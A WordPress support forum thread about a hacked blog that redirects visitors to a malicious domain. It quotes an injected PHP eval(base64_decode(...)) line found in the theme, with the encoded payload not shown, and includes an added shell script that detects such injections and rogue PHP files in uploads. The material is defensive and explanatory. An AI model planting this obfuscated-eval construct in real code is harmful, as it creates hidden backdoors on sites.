• The blog: https://newsrealblog.com

    I am having issues with some viewers being directed to zdespaleva.net, even when posting a new article.

    Once the site loads, I have only seen it direct to this domain once, but others are having repetitive issues. Sometimes the dashboard doesn’t load. Also, many of the bloggers cannot log in due to bad credentials, even after resetting the password.

    The domain zdespaleva was registered recently and about the same time we started seeing issues.

    Any ideas? Where can I start to remove this?

Viewing 15 replies - 1 through 15 (of 15 total)
  • Thread Starter dashton

    (@dashton)

    To be clearer, the dashboard looks like it is loading without PHP.

    Also, viewers are being asked to install a plugin, then a smiley pops up with a “F U”.

    Thread Starter dashton

    (@dashton)

    Also, when in the dashboard, my browser is trying to load from that domain: “Waiting for https://zdespaleva.net..”

    Thread Starter dashton

    (@dashton)

    I just pulled this out of my footer:

    <?php /**/ eval(base64_decode("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"));?>

    yeah…yer hacked.

    Check around any files on your server that end in a php extension.

    There’s a chance some, or all, of them have that stuff in them.

    https://codex.www.ads-software.com/FAQ_My_site_was_hacked
    then read this, and get busy

    It takes quite a bit to clean a hacked WP install, especially if the hack bled over into other software and stuff on your server

    Thread Starter dashton

    (@dashton)

    Thanks for the reply and link. I found it in every php file in the theme. I pretty much got it cleared up but you’re right, it’s all over the dashboard so I need to check all of the files. I will be switching to a clean install of WordPress and will do a manual transfer and check every file individually.

    yeah…that hack sucks. Make sure you follow all the advice given in that link, and the links from that page

    once you clean everything up, you’ve gotta make sure it doesn’t happen again by hardening your install

    Also, if you have other software installed on your host, check around…I had every php file on my whole server infected

    and finally, when you do a fresh install, it will clean up all wp files. you’ll have to manually clean your theme, or reinstall. Then you will have to reinstall all plugins as those probably got infected. And finally, you will most likely need to clean your wp-config.php file, as that doesn’t get replaced by a reinstall.

    Good Luck

    Thread Starter dashton

    (@dashton)

    When you were infected, do you know if it’s just the base64_decode php line that needs to be removed, or is there an additional handler in the code?

    It happened to me twice. Once I was able to look at my access logs based on the timestamp of when my files were changed. That led to 2 rogue php files named things like wp-settings.php that were in a product folder in a shop I ran, and in the 11/2008 uploads folder of a different WP install.

    Those files were allowing things to be inserted into other files.

    The second time, I had a bizarrely named file in my WP root that was allowing the access.

    So basically I had to get rid of all the base64 stuff, and the rogue php files
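    Voodoo’s two posts above boil down to three checks: look for the injected eval(base64_decode(...)) line in every .php file, look for rogue PHP files dropped where only media should be (the uploads folder), and use the timestamps of whatever changed to find the matching request in the access log. The script below is an added example written for this thread, not code from the thread or from WordPress itself; it assumes the standard WordPress layout (wp-content/uploads) and a GNU or BSD grep and find, and the function names are mine.

```shell
#!/bin/sh
# Added triage helper for a WordPress install showing the symptoms in this
# thread. Not part of the thread or of WordPress; assumes the standard layout
# (wp-content/uploads) and a GNU or BSD grep/find. Function names are mine.
# Usage: sh wp_triage.sh /path/to/wordpress [days]

# 1. Legitimate .php files that carry an injected eval(base64_decode(...)) call,
#    the pattern the thread starter pulled out of the theme footer.
find_injected_php() {
    # -l prints only the file name; "no match" exits 1, which is the good case,
    # so swallow that status instead of letting set -e abort the caller.
    grep -rl --include='*.php' \
        'eval[[:space:]]*([[:space:]]*base64_decode[[:space:]]*(' "$1" 2>/dev/null || :
}

# 2. Any PHP under wp-content/uploads. Uploads should hold media only, so every
#    hit here is a candidate dropper like the fake wp-settings.php Voodoo found.
find_php_in_uploads() {
    find "$1/wp-content/uploads" -type f \
        \( -name '*.php' -o -name '*.phtml' -o -name '*.php[0-9]' \) 2>/dev/null || :
}

# 3. Files touched in the last N days (default 2). Their timestamps are what you
#    then look up in the web server access log to find the request that wrote them.
find_recently_modified() {
    find "$1" -type f -mtime "-${2:-2}" 2>/dev/null || :
}

wp_triage() {
    root=$1
    days=${2:-2}
    echo "== PHP files carrying eval(base64_decode(...)) =="
    find_injected_php "$root"
    echo "== PHP files under wp-content/uploads (expect none) =="
    find_php_in_uploads "$root"
    echo "== Files modified in the last $days day(s); match these against the access log =="
    find_recently_modified "$root" "$days"
}

# Run only when a path is given so the file can also be sourced for its functions.
if [ -n "${1:-}" ]; then
    wp_triage "$1" "${2:-2}"
fi
```

Treat the output as a list of things to delete or replace from a known-clean copy, not as the whole story: the posters above found that the injected line was only the symptom, and the files that did the writing were the rogue ones sitting in uploads and in the WP root. After the cleanup, reinstalling core, plugins and theme from fresh downloads and keeping PHP out of the uploads directory is what stops the same file from coming back.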

    Thread Starter dashton

    (@dashton)

    Thanks again Voodoo.

    For Sure

    Can this infect my laptop with a virus because I went on farmvillefreak.com and was sent to zdespaleva.net, or is it just something that affects WordPress sites? Can this crash my computer?

    I’m pretty sure your computer is safe with this particular issue. You run an antivirus I assume?

    Yes I did, but it came up with a pop up saying “Windows Internet Explorer… fck you!” and I’m just a little bit worried.

    Thread Starter dashton

    (@dashton)

    Not sure if you’re still around Dart, but you weren’t accessing the site I mentioned prior were you? Could it be that the server was hit, and it’s spreading to multiple sites?

    Is that even possible? I thought on a shared hosting account each website directory was separate from each other?

    Well, it was a blog, so I’m not sure. I only joined WordPress to comment on here because I wanted to know that my laptop was safe, since I don’t know what it was; I’m no computer genius.

  • The topic ‘WordPress Hacked?’ is closed to new replies.